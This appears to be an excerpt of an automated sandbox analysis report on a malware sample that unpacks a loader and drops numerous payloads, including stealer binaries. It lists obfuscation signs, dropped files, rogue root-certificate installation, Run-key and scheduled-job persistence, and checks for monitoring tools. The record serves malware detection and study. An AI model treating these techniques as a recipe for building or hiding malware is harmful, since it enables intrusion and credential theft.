Source: Binary string: c:\rje\tg\7v\obj\Release\Qrr.pdb source: axplong.exe, 00000006.00000002.3518419435.0000000000F15000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3252257395.0000000000F15000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3252600342.0000000000F26000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.b50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tutljgzd:EW;nhtewlaz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tutljgzd:EW;nhtewlaz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 2.2.axplong.exe.200000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tutljgzd:EW;nhtewlaz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tutljgzd:EW;nhtewlaz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 3.2.axplong.exe.200000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tutljgzd:EW;nhtewlaz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tutljgzd:EW;nhtewlaz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 6.2.axplong.exe.200000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tutljgzd:EW;nhtewlaz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tutljgzd:EW;nhtewlaz:EW;.taggant:EW;
Yara detected Costura Assembly Loader
Source: Yara match File source: 35.2.rstxdhuj.exe.5fa0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000002.3310805165.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.3116851630.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Binary contains a suspicious time stamp
Source: penis[1].exe.6.dr Static PE information: 0xFDE1D90B [Tue Dec 23 00:53:31 2104 UTC]
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: random[1].exe.6.dr Static PE information: real checksum: 0x1cf94b should be: 0x1d61a0
Source: Nework[1].exe.6.dr Static PE information: real checksum: 0x0 should be: 0x6abc6
Source: gold.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x5aa4a
Source: needmoney.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x417a7a
Source: needmoney[1].exe.6.dr Static PE information: real checksum: 0x0 should be: 0x417a7a
Source: 12dsvc[1].exe.6.dr Static PE information: real checksum: 0x0 should be: 0xe2c06
Source: axplong.exe.0.dr Static PE information: real checksum: 0x1dfdb9 should be: 0x1dd3b6
Source: stealc_default2.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x31181
Source: penis[1].exe.6.dr Static PE information: real checksum: 0x0 should be: 0x6b425
Source: 12dsvc.exe.6.dr Static PE information: real checksum: 0x0 should be: 0xe2c06
Source: Nework.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x6abc6
Source: stealc_default2[1].exe.6.dr Static PE information: real checksum: 0x0 should be: 0x31181
Source: file.exe Static PE information: real checksum: 0x1dfdb9 should be: 0x1dd3b6
Source: 3ab68b6f1f.exe.6.dr Static PE information: real checksum: 0x1d6d24 should be: 0x1df226
Source: c6f71c9f40.exe.6.dr Static PE information: real checksum: 0x1cf94b should be: 0x1d61a0
Source: random[1].exe0.6.dr Static PE information: real checksum: 0x1d6d24 should be: 0x1df226
Source: gold[1].exe.6.dr Static PE information: real checksum: 0x0 should be: 0x5aa4a
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: tutljgzd
Source: file.exe Static PE information: section name: nhtewlaz
Source: file.exe Static PE information: section name: .taggant
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: tutljgzd
Source: axplong.exe.0.dr Static PE information: section name: nhtewlaz
Source: axplong.exe.0.dr Static PE information: section name: .taggant
Source: Microsoft-Edge[1].exe.6.dr Static PE information: section name: .xdata
Source: Microsoft-Edge[1].exe.6.dr Static PE information: section name: /4
Source: Microsoft-Edge[1].exe.6.dr Static PE information: section name: /19
Source: Microsoft-Edge[1].exe.6.dr Static PE information: section name: /31
Source: Microsoft-Edge[1].exe.6.dr Static PE information: section name: /45
Source: Microsoft-Edge[1].exe.6.dr Static PE information: section name: /57
Source: Microsoft-Edge[1].exe.6.dr Static PE information: section name: /70
Source: Microsoft-Edge[1].exe.6.dr Static PE information: section name: /81
Source: Microsoft-Edge[1].exe.6.dr Static PE information: section name: /92
Source: Microsoft-Edge.exe.6.dr Static PE information: section name: .xdata
Source: Microsoft-Edge.exe.6.dr Static PE information: section name: /4
Source: Microsoft-Edge.exe.6.dr Static PE information: section name: /19
Source: Microsoft-Edge.exe.6.dr Static PE information: section name: /31
Source: Microsoft-Edge.exe.6.dr Static PE information: section name: /45
Source: Microsoft-Edge.exe.6.dr Static PE information: section name: /57
Source: Microsoft-Edge.exe.6.dr Static PE information: section name: /70
Source: Microsoft-Edge.exe.6.dr Static PE information: section name: /81
Source: Microsoft-Edge.exe.6.dr Static PE information: section name: /92
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: llbyxbem
Source: random[1].exe.6.dr Static PE information: section name: vndwcpmt
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: c6f71c9f40.exe.6.dr Static PE information: section name:
Source: c6f71c9f40.exe.6.dr Static PE information: section name: .rsrc
Source: c6f71c9f40.exe.6.dr Static PE information: section name: .idata
Source: c6f71c9f40.exe.6.dr Static PE information: section name:
Source: c6f71c9f40.exe.6.dr Static PE information: section name: llbyxbem
Source: c6f71c9f40.exe.6.dr Static PE information: section name: vndwcpmt
Source: c6f71c9f40.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: xmjcxhmw
Source: random[1].exe0.6.dr Static PE information: section name: lqsidhwe
Source: random[1].exe0.6.dr Static PE information: section name: .taggant
Source: 3ab68b6f1f.exe.6.dr Static PE information: section name:
Source: 3ab68b6f1f.exe.6.dr Static PE information: section name: .idata
Source: 3ab68b6f1f.exe.6.dr Static PE information: section name:
Source: 3ab68b6f1f.exe.6.dr Static PE information: section name: xmjcxhmw
Source: 3ab68b6f1f.exe.6.dr Static PE information: section name: lqsidhwe
Source: 3ab68b6f1f.exe.6.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0021D84C push ecx; ret 6_2_0021D85F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0648E320 push es; ret 11_2_0648E330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0648EFB2 push eax; ret 11_2_0648EFC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0648C9E1 push es; ret 11_2_0648C9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00428E7D push esi; ret 15_2_00428E86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_004076E0 push ecx; ret 15_2_004076F3
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004F7333 push 04EC839Eh; mov dword ptr [esp], edi 16_2_004F733A
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_058EC413 push ss; iretd 17_2_058EC41A
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_058EC411 push ss; iretd 17_2_058EC412
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_06AF369F push ebx; iretd 17_2_06AF36A2
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_06AF3721 push esp; iretd 17_2_06AF3722
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_06AF3743 push ebp; iretd 17_2_06AF374A
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_06AF3740 push esi; iretd 17_2_06AF3742
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_06AF35E3 push ebx; iretd 17_2_06AF35EA
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_06AF4261 pushad ; iretd 17_2_06AF4262
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_06AFECF2 push eax; ret 17_2_06AFED01
Source: file.exe Static PE information: section name: entropy: 7.97957201146314
Source: file.exe Static PE information: section name: tutljgzd entropy: 7.954503942992439
Source: axplong.exe.0.dr Static PE information: section name: entropy: 7.97957201146314
Source: axplong.exe.0.dr Static PE information: section name: tutljgzd entropy: 7.954503942992439
Source: random[1].exe.6.dr Static PE information: section name: llbyxbem entropy: 7.9547357115051796
Source: c6f71c9f40.exe.6.dr Static PE information: section name: llbyxbem entropy: 7.9547357115051796
Source: random[1].exe0.6.dr Static PE information: section name: entropy: 7.982298825407469
Source: random[1].exe0.6.dr Static PE information: section name: xmjcxhmw entropy: 7.954658026811254
Source: 3ab68b6f1f.exe.6.dr Static PE information: section name: entropy: 7.982298825407469
Source: 3ab68b6f1f.exe.6.dr Static PE information: section name: xmjcxhmw entropy: 7.954658026811254
Source: gold[1].exe.6.dr Static PE information: section name: .text entropy: 7.996189613972712
Source: gold.exe.6.dr Static PE information: section name: .text entropy: 7.996189613972712
Source: 12dsvc[1].exe.6.dr Static PE information: section name: .text entropy: 7.999068736163035
Source: 12dsvc.exe.6.dr Static PE information: section name: .text entropy: 7.999068736163035

Persistence and Installation Behavior
barindex
Installs new ROOT certificates
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob Jump to behavior
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\Microsoft-Edge[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\neon[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe File created: C:\Users\user\AppData\Local\Temp\svchost015.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File created: C:\Users\user\AppData\Local\Temp\NetSup_Buil2d.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\needmoney[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe File created: C:\Users\user\AppData\Roaming\Ylrdnrwcx.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000356001\neon.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\crypted[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000355001\3ab68b6f1f.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\gold[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\12dsvc[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\stealc_default2[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\newbundle2[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\rstxdhuj[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\LummaC222222[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\Nework[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\penis[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\cccc2[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000357001\Microsoft-Edge.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c6f71c9f40.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3ab68b6f1f.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ylrdnrwcx
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Window searched: window name: Regmonclass
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c6f71c9f40.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c6f71c9f40.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3ab68b6f1f.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3ab68b6f1f.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ylrdnrwcx
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ylrdnrwcx
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
